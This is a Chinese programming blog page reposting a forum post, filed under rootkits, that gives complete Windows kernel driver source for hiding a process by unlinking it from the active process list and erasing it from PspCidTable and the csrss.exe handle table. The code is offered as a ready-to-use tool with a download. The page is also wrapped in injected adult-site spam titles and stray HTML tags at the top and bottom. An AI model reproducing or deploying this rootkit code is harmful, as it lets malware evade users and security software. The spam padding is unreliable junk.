青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

科普之三招隱藏進程

Posted on 2009-10-30 00:10 S.l.e!ep.¢% 閱讀(467) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
【原創】科普之三招隱藏進程
cooldiyer 當前離線 添加 cooldiyer 的聲望 反映此帖
標 題: 【原創】科普之三招隱藏進程
作 者: cooldiyer
時 間: 2008-09-20,11:58
鏈 接: http://bbs.pediy.com/showthread.php?t=73129
先從活動進程鏈表中摘除?擦除PspCidTable中對應的Object?再擦除Csrss進程中那份表
擦除HandleTable表用了一些技巧,不用親自操作三層表,不是網上流傳的方法,具體請看代碼......

使用的時候直接HideProcessById(HIDE_PID)就行了
偶這只菜鳥的學習總結,牛們不要BS,我會超過你們的.很快

ProcessHide.h
代碼:
#ifndef?__PROCESSHIDE_H__
#define?__PROCESSHIDE_H__

#ifdef?__cplusplus
extern?"C"?{
#endif

#include?<ntddk.h>

/*
?使用之前請先調用InitializeCommonVariables初始化全局變量
*/

typedef?struct?_HANDLE_TABLE_ENTRY?{
??
????//
????//??The?pointer?to?the?object?overloaded?with?three?ob?attributes?bits?in
????//??the?lower?order?and?the?high?bit?to?denote?locked?or?unlocked?entries
????//
??
????union?{
????
????????PVOID?Object;
????
????????ULONG?ObAttributes;
????};
??
????//
????//??This?field?either?contains?the?granted?access?mask?for?the?handle?or?an
????//??ob?variation?that?also?stores?the?same?information.??Or?in?the?case?of
????//??a?free?entry?the?field?stores?the?index?for?the?next?free?entry?in?the
????//??free?list.??This?is?like?a?FAT?chain,?and?is?used?instead?of?pointers
????//??to?make?table?duplication?easier,?because?the?entries?can?just?be
????//??copied?without?needing?to?modify?pointers.
????//
??
????union?{
????
????????union?{
??????
????????????ACCESS_MASK?GrantedAccess;
??????
????????????struct?{
????????
????????????????USHORT?GrantedAccessIndex;
????????????????USHORT?CreatorBackTraceIndex;
????????????};
????????};
????
????????LONG?NextFreeTableEntry;
????};
??
}?HANDLE_TABLE_ENTRY,?*PHANDLE_TABLE_ENTRY;

typedef?struct?_HANDLE_TABLE?{
??
????//
????//??A?set?of?flags?used?to?denote?the?state?or?attributes?of?this
????//??particular?handle?table
????//
??
????ULONG?Flags;
??
????//
????//??The?number?of?handle?table?entries?in?use.
????//
??
????LONG?HandleCount;
??
????//
????//??A?pointer?to?the?top?level?handle?table?tree?node.
????//
??
????PHANDLE_TABLE_ENTRY?**Table;
??
????//
????//??The?process?who?is?being?charged?quota?for?this?handle?table?and?a
????//??unique?process?id?to?use?in?our?callbacks
????//
??
????struct?_EPROCESS?*QuotaProcess;
????HANDLE?UniqueProcessId;
??
????//
????//??This?is?a?singly?linked?list?of?free?table?entries.??We?don't?actually
????//??use?pointers,?but?have?each?store?the?index?of?the?next?free?entry
????//??in?the?list.??The?list?is?managed?as?a?lifo?list.??We?also?keep?track
????//??of?the?next?index?that?we?have?to?allocate?pool?to?hold.
????//
??
????LONG?FirstFreeTableEntry;
????LONG?NextIndexNeedingPool;
??
????//
????//??This?is?the?lock?used?to?protect?the?fields?in?the?record,?and?the
????//??handle?table?tree?in?general.??Individual?handle?table?entries?that?are
????//??not?free?have?their?own?lock
????//
??
????ERESOURCE?HandleTableLock;
??
????//
????//??The?list?of?global?handle?tables.??This?field?is?protected?by?a?global
????//??lock.
????//
??
????LIST_ENTRY?HandleTableList;
??
????//
????//??The?following?field?is?used?to?loosely?synchronize?thread?contention
????//??on?a?handle.??If?a?thread?wants?to?wait?for?a?handle?to?be?unlocked
????//??it?will?wait?on?this?event?with?a?short?timeout.??Any?handle?unlock
????//??operation?will?pulse?this?event?if?there?are?threads?waiting?on?it
????//
??
????KEVENT?HandleContentionEvent;
}?HANDLE_TABLE,?*PHANDLE_TABLE;??

typedef?BOOLEAN?(*EX_ENUMERATE_HANDLE_ROUTINE)(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?PVOID?EnumParameter
??);

typedef?BOOLEAN?(*__ExEnumHandleTable)(
??IN?PHANDLE_TABLE?HandleTable,
??IN?EX_ENUMERATE_HANDLE_ROUTINE?EnumHandleProcedure,
??IN?PVOID?EnumParameter,
??OUT?PHANDLE?Handle?OPTIONAL
??);

NTSTATUS
GetPspCidTable(
??OUT?PHANDLE_TABLE*?ppPspCidTable
??);

BOOLEAN
EnumHandleCallback(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?OUT?PVOID?EnumParameter
??);

NTSTATUS
EraseObjectFromHandleTable(
??PHANDLE_TABLE?pHandleTable,
??IN?HANDLE?ProcessId
??);

NTSTATUS
RemoveNodeFromActiveProcessLinks(
??IN?HANDLE?ProcessId
??);

NTSTATUS
HideProcessById(
??IN?HANDLE?ProcessId
??);

NTSTATUS
InitializeCommonVariables(
??);

NTSTATUS
GetProcessNameOffset(
??OUT?PULONG??Offset?OPTIONAL
??);

NTSTATUS
LookupProcessByName(
??IN?PCHAR?pcProcessName,
??OUT?PEPROCESS?*Process
??);
#ifdef?__cplusplus
}?//?extern?"C"
#endif

#endif?//?__PROCESSHIDE_H__
ProcessHide.c
代碼:
#include?"ProcessHide.h"
#include?"LDasm.h"

ULONG????g_Offset_Eprocess_Name?=?NULL;
ULONG????g_Offset_Eprocess_Flink?=?NULL;
ULONG????g_Offset_Eprocess_ProcessId?=?NULL;
ULONG????g_Offset_Eprocess_HandleTable?=?NULL;

PEPROCESS??g_pEprocess_System?=?NULL;


NTSTATUS
GetPspCidTable(
??OUT?PHANDLE_TABLE*?ppPspCidTable
??)
??/*
??通過搜索PsLookupProcessByProcessId函數,獲取PspCidTable的地址
??*/
{
??NTSTATUS????status;
??PUCHAR??????cPtr;
??unsigned?char?*?pOpcode;
??ULONG??????Length;
??UNICODE_STRING??uniPsLookup;
??ULONG??????PsLookupProcessByProcessId;

??status?=?STATUS_NOT_FOUND;

??RtlInitUnicodeString(&uniPsLookup,?L"PsLookupProcessByProcessId");?
??PsLookupProcessByProcessId?=?MmGetSystemRoutineAddress(&uniPsLookup);?//MmGetSystemRoutineAddress可以通過函數名獲得函數地址

??for?(cPtr?=?(PUCHAR)PsLookupProcessByProcessId;
????cPtr?<?(PUCHAR)PsLookupProcessByProcessId?+?PAGE_SIZE;
????cPtr?+=?Length)
??{
????Length?=?SizeOfCode(cPtr,?&pOpcode);????//credit?to?LDasm.c?by?Ms-Rem
????if?(!Length)?break;
????if?(*(PUSHORT)cPtr?==?0x35FF?&&?*(pOpcode?+?6)?==?0xE8)
????{
??????*ppPspCidTable?=?**(PVOID?**)(pOpcode?+?2);
??????status?=?STATUS_SUCCESS;
??????break;
????}
??}
??return?status;
}

BOOLEAN
EnumHandleCallback(
??IN?PHANDLE_TABLE_ENTRY?HandleTableEntry,
??IN?HANDLE?Handle,
??IN?OUT?PVOID?EnumParameter
??)
{
??if?(ARGUMENT_PRESENT(EnumParameter)?&&?*(HANDLE?*)EnumParameter?==?Handle)
??{
????*(PHANDLE_TABLE_ENTRY?*)EnumParameter?=?HandleTableEntry;
????return?TRUE;
??}
??return?FALSE;
}

//?修改一下,可以傳遞要擦除的ID做參數
NTSTATUS
EraseObjectFromHandleTable(
??PHANDLE_TABLE?pHandleTable,
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS????status;
????
??PVOID??????EnumParameter;
??UNICODE_STRING??uniExEnumHandleTable;

??__ExEnumHandleTable??ExEnumHandleTable;

??status?=?STATUS_NOT_FOUND;
??EnumParameter?=?ProcessId;


??RtlInitUnicodeString(&uniExEnumHandleTable,?L"ExEnumHandleTable");
??ExEnumHandleTable?=?MmGetSystemRoutineAddress(&uniExEnumHandleTable);

??if?(NULL?==?ExEnumHandleTable)
??{
????return?STATUS_NOT_FOUND;
??}

??//?Enum后可以擦除,Callback過程中不能擦除
??if?(ExEnumHandleTable(pHandleTable,?EnumHandleCallback,?&EnumParameter,?NULL))
??{
????InterlockedExchangePointer(&((PHANDLE_TABLE_ENTRY)EnumParameter)->Object,?NULL);
????status?=?STATUS_SUCCESS;
??}

??return?status;
}

NTSTATUS
RemoveNodeFromActiveProcessLinks(
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS??status;
??PLIST_ENTRY??pListEntry;
??PEPROCESS??pEprocess;

??status?=?PsLookupProcessByProcessId(ProcessId,?&pEprocess);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}
??ObDereferenceObject(pEprocess);

??pListEntry?=?(ULONG)pEprocess?+?g_Offset_Eprocess_Flink;

??//?從鏈表中摘除
??pListEntry->Blink->Flink?=?pListEntry->Flink;
??pListEntry->Flink->Blink?=?pListEntry->Blink;

??return?status;
}


NTSTATUS
HideProcessById(
??IN?HANDLE?ProcessId
??)
{
??NTSTATUS????status;
??PHANDLE_TABLE??pPspCidTable;
??PEPROCESS????pCsrssEprocess?=?NULL;


??if?(NULL?==?g_Offset_Eprocess_HandleTable)
??{
????status?=?InitializeCommonVariables();
????if?(!NT_SUCCESS(status))
????{
??????return?status;
????}
??}

??status?=?GetPspCidTable(&pPspCidTable);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??status?=?LookupProcessByName("CSRSS.EXE\0",?&pCsrssEprocess);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??//?先從活動進程鏈表中摘除
??status?=?RemoveNodeFromActiveProcessLinks(ProcessId);


??//?擦除PspCidTable中對應的Object
??status?=?EraseObjectFromHandleTable(pPspCidTable,?ProcessId);


??//?擦除Csrss進程中那份表
??status?=?EraseObjectFromHandleTable(*(PULONG)((ULONG)pCsrssEprocess?+?g_Offset_Eprocess_HandleTable),?ProcessId);


??return?status;
}

NTSTATUS
LookupProcessByName(
??IN?PCHAR?pcProcessName,
??OUT?PEPROCESS?*pEprocess
??)
{?
??NTSTATUS??status;
??ULONG????uCurrentProcessId?=?0;
??ULONG????uStartProcessId?=?0;?
??ULONG????uCount?=?0;
??ULONG????uLength?=?0;
??PLIST_ENTRY??pListActiveProcess;
??PEPROCESS??pCurrentEprocess?=?NULL;

??
??if?(!ARGUMENT_PRESENT(pcProcessName)?||?!ARGUMENT_PRESENT(pEprocess))
??{
????return?STATUS_INVALID_PARAMETER;
??}

??uLength?=?strlen(pcProcessName);

??pCurrentEprocess?=?g_pEprocess_System;

??uStartProcessId?=?*((PULONG)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_ProcessId));

??uCurrentProcessId?=?uStartProcessId;

??while(1)
??{
????if(_strnicmp(pcProcessName,?(PVOID)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_Name),?uLength)?==?0)
????{
??????*pEprocess?=?pCurrentEprocess;
??????status?=?STATUS_SUCCESS;
??????break;
????}
????else?if?((uCount?>=?1)?&&?(uStartProcessId?==?uCurrentProcessId))
????{
??????*pEprocess?=?0x00000000;
??????status?=?STATUS_NOT_FOUND;
??????break;
????}
????else?
????{
??????pListActiveProcess?=?(LIST_ENTRY?*)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_Flink);
??????(ULONG)pCurrentEprocess?=?(ULONG)pListActiveProcess->Flink;
??????(ULONG)pCurrentEprocess?=?(ULONG)pCurrentEprocess?-?g_Offset_Eprocess_Flink;
??????uCurrentProcessId?=?*(PULONG)((ULONG)pCurrentEprocess?+?g_Offset_Eprocess_ProcessId);
??????uCount++;
????}
??}
??return?status;
}

NTSTATUS
GetProcessNameOffset(
??OUT?PULONG??Offset?OPTIONAL
??)
???????????/*
???????????在DriverEntry中調用
???????????*/
{
??NTSTATUS??status;
??PEPROCESS??curproc;
??ULONG??????i;

??if?(!MmIsAddressValid((PVOID)Offset))
??{
????status?=?STATUS_INVALID_PARAMETER;
????return?status;
??}

??curproc?=?PsGetCurrentProcess();

??//
??//?然后搜索KPEB,得到ProcessName相對KPEB的偏移量
??//?偏移174h的位置,這里存的是進程的短文件名,少數地方用,
??//?比如SoftIce的addr和proc命令,如果名稱超過16個字符直接截斷

??//?Scan?for?12KB,?hopping?the?KPEB?never?grows?that?big!
??//
??for(?i?=?0;?i?<?3?*?PAGE_SIZE;?i++?)?{

????if(!strncmp(?"System",?(PCHAR)?curproc?+?i,?strlen("System")))?{
??????*Offset?=?i;
??????status?=?STATUS_SUCCESS;
??????break;
????}
??}
??return?status;
}

NTSTATUS
InitializeCommonVariables(
??)
{
??NTSTATUS??status;
??ULONG??uMajorVersion;
??ULONG??uMinorVersion;

??status?=?GetProcessNameOffset(&g_Offset_Eprocess_Name);

??if?(!NT_SUCCESS(status))
??{
????return?status;
??}

??g_pEprocess_System?=?PsGetCurrentProcess();

??PsGetVersion(&uMajorVersion,?&uMinorVersion,?NULL,?NULL);

??if?(uMajorVersion?==?4?&&?uMinorVersion?==?0)
??{
????g_Offset_Eprocess_Flink?=?152;
????//?Stop?supporting?NT?4.0
????return?STATUS_UNSUCCESSFUL;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?0)
??{
????g_Offset_Eprocess_ProcessId?=?156;
????g_Offset_Eprocess_Flink?=?160;
????g_Offset_Eprocess_HandleTable?=?0x128;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?1)
??{
????g_Offset_Eprocess_ProcessId?=?132;
????g_Offset_Eprocess_Flink?=?136;
????g_Offset_Eprocess_HandleTable?=?0xC4;
??}
??else?if?(uMajorVersion?==?5?&&?uMinorVersion?==?2)
??{
????g_Offset_Eprocess_ProcessId?=?132;
????g_Offset_Eprocess_Flink?=?136;
????g_Offset_Eprocess_HandleTable?=?0xC4;
??}

??return?STATUS_SUCCESS;
}

上傳的附件
文件類型: rar ProcessHide.rar (6.1 KB, 465 次下載) [誰下載?]
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            
在线观看欧美日韩|
欧美视频一区二区三区四区|
欧美一级淫片播放口|
欧美日韩精品免费观看视频|
欧美电影美腿模特1979在线看
|
久久久久久久性|
久久久一区二区|
久久噜噜亚洲综合|
亚洲欧美日韩在线高清直播|
久久国产精品久久久久久|
亚洲精品视频在线看|
久久精品亚洲一区二区三区浴池
|
久久综合国产精品|
亚洲视频一区在线|
精品福利电影|
久久永久免费|
亚洲成在线观看|
亚洲精品在线免费观看视频|
99在线|亚洲一区二区|
欧美色精品在线视频|
国产精品视屏|
欧美日韩在线大尺度|
老司机午夜精品|
国产精品v欧美精品∨日韩|
亚洲国产第一|
欧美午夜电影在线|
国产精品专区一|
亚洲精品自在久久|
欧美专区一区二区三区|
免费日韩一区二区|
欧美激情小视频|
亚洲三级视频在线观看|
91久久视频|
99热这里只有成人精品国产|
久久一综合视频|
日韩视频免费看|
久久噜噜亚洲综合|
亚洲欧美日韩精品在线|
香蕉成人久久|
国产一区视频在线看|
亚洲免费视频观看|
久久久久久久欧美精品|
亚洲视频一区二区免费在线观看|
午夜一区二区三视频在线观看
|
国产精品毛片va一区二区三区|
国产美女精品免费电影|
在线观看日韩国产|
国语对白精品一区二区|
中国av一区|
奶水喷射视频一区|
99精品国产一区二区青青牛奶|
久久xxxx|
亚洲第一伊人|
性欧美大战久久久久久久免费观看
|
亚洲人成7777|
亚洲日韩视频|
欧美裸体一区二区三区|
亚洲一区二区三区精品在线|
老妇喷水一区二区三区|
亚洲视频图片小说|
韩国欧美一区|
亚洲欧美日韩高清|
亚洲精品日本|
亚洲中字在线|
亚洲人成7777|
亚洲四色影视在线观看|
国产精品福利av|
狂野欧美性猛交xxxx巴西|
久久综合一区二区|
夜夜精品视频一区二区|
日韩午夜一区|
在线日韩成人|
欧美在线观看视频|
亚洲直播在线一区|
欧美中文字幕在线播放|
亚洲精品美女91|
午夜精品影院|
99视频在线精品国自产拍免费观看
|
亚洲精品乱码久久久久久日本蜜臀
|
国产精品久久久久久久久久三级
|
国内精品模特av私拍在线观看|
欧美大片免费|
国产精品网站在线观看|
久久久999|
亚洲国内自拍|
免费在线成人|
亚洲片在线资源|
精品二区久久|
美女视频黄免费的久久|
乱人伦精品视频在线观看|
国产精品久久久久久妇女6080|
欧美激情影音先锋|
国产一区二区观看|
欧美影院成人|
一本不卡影院|
免费视频一区二区三区在线观看|
国自产拍偷拍福利精品免费一|
久久精品人人做人人综合|
欧美一区在线看|
国产亚洲亚洲|
美女精品在线|
亚洲电影中文字幕|
国产精品久久波多野结衣|
久久精品一区二区|
亚洲一区二区欧美日韩|
久久精品免视看|
亚洲一区二区三区乱码aⅴ蜜桃女
亚洲一区二区三区乱码aⅴ
|
亚洲乱码精品一二三四区日韩在线
|
99www免费人成精品|
久久福利资源站|
亚洲国产欧美另类丝袜|
国产精品日韩一区二区|
久久夜色撩人精品|
99精品视频免费在线观看|
亚洲性xxxx|
亚洲激情在线|
一本色道**综合亚洲精品蜜桃冫
|
亚洲欧美另类在线|
亚洲大片在线观看|
国产精品网站在线观看|
麻豆精品91|
午夜精品福利视频|
亚洲视频一二区|
久久久中精品2020中文|
欧美一区二区精品久久911|
亚洲国产精品va在看黑人|
欧美一级久久久|
亚洲欧美日韩电影|
亚洲一区二区在线播放|
91久久综合|
亚洲国产女人aaa毛片在线|
国产精品高潮呻吟久久av无限|
亚洲一区美女视频在线观看免费|
91久久久久久久久|
欧美在线观看视频|
99亚洲伊人久久精品影院红桃|
国产精品久久久久久模特|
亚洲视频大全|
久久久久国产精品厨房|
亚洲欧美日韩爽爽影院|
欧美日韩爆操|
亚洲国产精品第一区二区|
国内外成人免费激情在线视频网站
|
欧美日韩国产一区|
欧美激情一二区|
国产日韩欧美三区|
亚洲免费小视频|
午夜一区二区三区不卡视频|
欧美天堂亚洲电影院在线观看
|
欧美高清在线一区|
亚洲第一精品夜夜躁人人爽|
亚洲日韩欧美视频一区|
欧美成人按摩|
亚洲区欧美区|
亚洲欧美精品一区|
国产一区激情|
久久久久久久网|
亚洲人成7777|
亚洲欧美日韩国产综合|
国产片一区二区|
久久免费国产|
99精品欧美一区二区三区综合在线|
亚洲欧美日韩精品久久奇米色影视|
国产亚洲aⅴaaaaaa毛片|
欧美一区二区三区四区在线
|
欧美日韩亚洲一区二区|
亚洲一区在线视频|
老司机凹凸av亚洲导航|
亚洲天堂成人在线观看|
国产伊人精品|
欧美久久久久中文字幕|
亚洲欧美伊人|
亚洲国产欧美另类丝袜|
久久av资源网|
一本色道精品久久一区二区三区|
国产曰批免费观看久久久|
欧美大片一区二区|
欧美一区亚洲一区|
亚洲国产精品黑人久久久|
午夜欧美精品久久久久久久|
亚洲激情在线激情|
国产精品视频免费一区|
欧美激情视频给我|
久久大综合网|
亚洲深夜激情|
欧美成人一区二免费视频软件|
午夜激情综合网|
亚洲精品中文字幕有码专区|
国产一区二区三区在线观看视频
|
欧美久久久久久久久久|
久久青草福利网站|
亚洲久久成人|
一区精品在线|
国产精品永久免费|
欧美激情免费在线|
久久一区二区三区四区|
午夜精品久久久|
妖精成人www高清在线观看|
亚洲第一在线综合网站|
久久久久久久久久久久久久一区|